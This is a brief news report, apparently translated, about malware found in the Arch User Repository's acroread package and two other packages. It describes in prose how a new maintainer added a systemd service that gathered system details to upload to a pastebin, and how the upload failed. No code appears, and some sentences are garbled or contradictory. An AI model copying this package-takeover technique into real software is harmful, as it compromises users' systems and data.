Malware found in Arch user repository AUR

Malware found in Arch user repository AUR


Arch warns on its website: “AUR packages are custom content. The use of the provided files is at your own risk «. That the warning should be taken seriously and the PKGBUILD files in the AUR, the arch repository with user-created and maintained packages, should always be checked prior to installation, unless the creator is trusted, proved to be a malware threat over the weekend. Code in the acroread package. An attentive user had reported the package. What the creator meant, one can only guess.
The compromised packet that had previously been orphaned for a while had been taken over by a user with the nickname “xeactor”. He had inserted a script that creates a systemd service that collects collected technical data about the affected system and sends it to a pastebin. However, “xeactor” made a mistake because his script did not work as expected. Two more packages were compromised in the same way. All affected packages are now removed and “xeactor” locked.
Among other things, the script evaluated commands such as uname -a and systemctl list-units and collected information about the CPU, Machine ID, and Pacman to send to a pastebin. A second called script should take over the sending, but failed, because instead of the function upload the name uploader was used. What “xeactor” was intended for remains unclear. The information read out could, in the worst case, have affected GPG or SSH keys, but were quite harmless.

Submitted by: Arnfried Walbrecht


Comments are closed.